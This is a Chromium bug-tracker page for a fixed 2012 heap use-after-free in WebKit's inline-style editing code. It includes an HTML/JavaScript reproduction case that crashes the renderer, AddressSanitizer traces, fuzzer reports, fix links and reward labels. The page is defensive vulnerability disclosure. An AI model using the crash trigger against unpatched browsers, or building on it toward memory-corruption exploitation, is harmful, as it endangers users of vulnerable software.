New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Closed: Mar 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
Reported by miau...@gmail.com, Mar 22 2012 Back to list


VULNERABILITY DETAILS
use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1078.0 (Developer Build 128192)
OS	Linux
WebKit	536.4 (@111590)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        x.innerHTML += ''
      }
      setTimeout(function() {
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('bold')
      }, 0)
    </script>
  </head>
  <body>
    <div id="x">
      <iframe src="data:"></iframe>
      <div>
        <input></input>
      </div>
    </ul>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==3487== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffc6b489c0 at pc 0x55555a8b5c80 bp 0x7fffffff9490 sp 0x7fffffff9488
READ of size 8 at 0x7fffc6b489c0 thread T0
    #0 0x55555a8b5c80 in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #1 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, 

0x7fffc6b489c0 is located 64 bytes inside of 104-byte region [0x7fffc6b48980,0x7fffc6b489e8)
freed by thread T0 here:
    #0 0x55555de4d932 in operator delete(void*) ??:0
    #1 0x55555a8b5a5a in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #2 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, WebCore::Position const&) ???:0

 
64104.txt
10.8 KB View Download
64104.html
408 bytes View Download
beta-64104.txt
10.9 KB View Download
stable-64104.txt
11.0 KB View Download
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecSeverity-High Stability-AddressSanitizer OS-All Mstone-17
Owner: infe...@chromium.org
Status: Assigned
Summary: Use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange (was: NULL)
Status: Started
webkit upstream - https://bugs.webkit.org/show_bug.cgi?id=81959
Cc: rniwa@chromium.org
Summary: Heap-use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=29322300

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7faac8486bc0
Crash State:
  - crash stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  - free stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  

Minimized Testcase (0.32 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94THgDdzgBmEY372A3m9xB3RhOGTy84hvmAqqBdMQRqL5XCG-FhintY_fvlXnByETeRMLYc3egV8KXuh3d4S2FOQbrfjsBQbFXs3249l7JujShbG-03ngVceSmki2qF19xI9snSZ1DiCfGTOIQGJ22U4gI1kA
<script>
      onload = function() {
        x.innerHTML += ''
      }
      setTimeout(function() {
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('bold')
      }, 0)
    </script>
  <div id="x">
      <iframe src="data:"></iframe>
      <div>
        <input></input>
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/112012
Labels: reward-topanel
Project Member Comment 7 by ClusterFuzz, Mar 26 2012
ClusterFuzz has detected this issue as fixed in range 128813:128890.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=29322300

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7faac8486bc0
Crash State:
  - crash stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  - free stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=128813:128890

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94THgDdzgBmEY372A3m9xB3RhOGTy84hvmAqqBdMQRqL5XCG-FhintY_fvlXnByETeRMLYc3egV8KXuh3d4S2FOQbrfjsBQbFXs3249l7JujShbG-03ngVceSmki2qF19xI9snSZ1DiCfGTOIQGJ22U4gI1kA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Mstone-17 -Merge-Approved Mstone-18 Merge-Merged
M18: http://trac.webkit.org/changeset/112630
Labels: -reward-topanel reward-1000 reward-unpaid CVE-2011-3075
$1000 and all that
Labels: -reward-unpaid
Comment 11 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 12 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 13 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecSeverity-High -Stability-AddressSanitizer -Mstone-18 Cr-Content Security-Impact-Stable M-18 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 14 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 15 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 18 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 19 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 20 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 21 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 22 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment